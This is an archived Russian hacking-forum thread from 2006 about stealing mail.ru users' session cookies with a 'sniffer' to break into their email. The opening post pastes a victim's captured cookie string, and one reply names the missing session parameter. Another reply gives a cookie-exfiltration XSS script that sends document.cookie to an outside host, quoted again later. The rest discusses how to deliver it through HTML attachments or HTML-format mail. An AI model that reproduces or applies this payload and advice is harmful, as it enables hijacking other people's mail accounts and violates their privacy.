PDA

Просмотр полной версии : Снифф для mail.ru бесполезен? =(


Ponchik
29.04.2006, 23:12
Всем привет! Вот у меня есть QUERY: MailUser=1; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAABAAABAAAAAAAAAAAAABMLxwcA; mrcu=5FEB43F6AE6665B689FC0BA8F857; answer431-3=1; answer431-8=1; answer431-4=1; answer431-5=1; b15719=undefined; vote435=1; answer435-5=1; vote440=1; answer440-1=1; p=uYMIAEqnQgAA; p_sid=2a1c2b25d56a3c9538586f8c306d5e77; searchuid=7478091140342773; c56=c1xYRAAAAAD5EwEAAAAA; c8=5sVTRAAAAAD9SgEAAAAAAPuCAQAAAAAA
Это из почты mail.ru, но ничего не получается =( Может что-то из этого ненужно забивать в куки, а некоторые значения вобще удалить? У меня ничё не получается :(

JazzzSummerMan
30.04.2006, 20:32
здесь нет главного параметра, единственного обязательного идентификатора, Mpopl вроде называется

Ponchik
01.05.2006, 02:45
Ах блин! Он тогда в почту не защёл, блин! А я уже противоялие дал =(((( Ладно, буду ещё кого-нибудь юзать, пасибо.

dinar_007
06.05.2006, 11:04
А что ты отправлял на почту, что на сниффере это отобразилось? Какой код?

gLAnce
06.05.2006, 14:39
наверно прикрипленный html файл с обычным
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

dinar_007
06.05.2006, 19:38
Хочешь сказать, что если просто прикрепить хтмл файл к письму с таким скриптом, то хсс прокатит? Я думаю, что нет... Нужно письмо в хтмл формате отсылать... Да и к тому-же этот метод, что приведёт выше не прокатывает уже, как пол года или больше...

gLAnce
06.05.2006, 19:51
Хочешь сказать, что если просто прикрепить хтмл файл к письму с таким скриптом, то хсс прокатит? Я думаю, что нет... Нужно письмо в хтмл формате отсылать... Да и к тому-же этот метод, что приведёт выше не прокатывает уже, как пол года или больше...

нет нет нет, фишка в том что чел отсылает прикрепленный html файл, а юзер открывает этот прикрепленный файл.....
а так конечно не пашет =)

dinar_007
06.05.2006, 20:29
Так прикреплённый файл-то сначала скачать надо думаю и он срабатывать будит на машине жертвы в автономном режиме... Ну да ладно...

DRON-ANARCHY
06.05.2006, 21:10
Че-то я тоже не особо понял, к чему этот html файл... Явно не так дело было!=)

gLAnce
06.05.2006, 21:24
Так прикреплённый файл-то сначала скачать надо думаю и он срабатывать будит на машине жертвы в автономном режиме... Ну да ладно...

не ну там можно скачать а можно открыть..

dinar_007
06.05.2006, 21:47
А разницы нет... Если просто открыть, то он всё-равно перед этим скачается временным файлом, а потом откроется...

olen
12.05.2006, 18:11
С етово я понял чо сниферить мейл.ру невыгодно ..
Мож ктото скажет реально на каких почтовых серверах прокатит ето ??

bxN5
12.05.2006, 20:25
На известных почтовых службах етот баг (если он появляется)сразу же прикрывают:)

bul.666
27.06.2006, 23:03
наверно прикрипленный html файл с обычным
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Че за бред?! Если хочешь куки юзверя... Нужно чтоб этот код выполнялся на странице "БРАУЗЕРA" http://win.mail.ru/cgi-bin/readmsg... А не в отдельном файле, которое находиться не на сервере а на твоем компе...
document.cookie - Передает куки данного домена... Короче думаю понял )

nc.STRIEM
28.06.2006, 00:12
Пробовал отсылать картинку снифер! всерн не получаеться! Походу на mail.ru снифер не прокатует...

Sn@k3
28.06.2006, 00:40
ээээ.вроде если приклепляешь файл хтмл(и больше ничего, вроде) и открываешь в браузере сою почту, то он, вроде, а втоматически его открывает ввиде страницы прям в самом письме, пробовать надо, да ещё надо отправлять не в виде текста) вот тогда должно всё прокатить, но может и не прокатить, так ка он всё содержимое читает и показывает маленькую картинку с предупреждением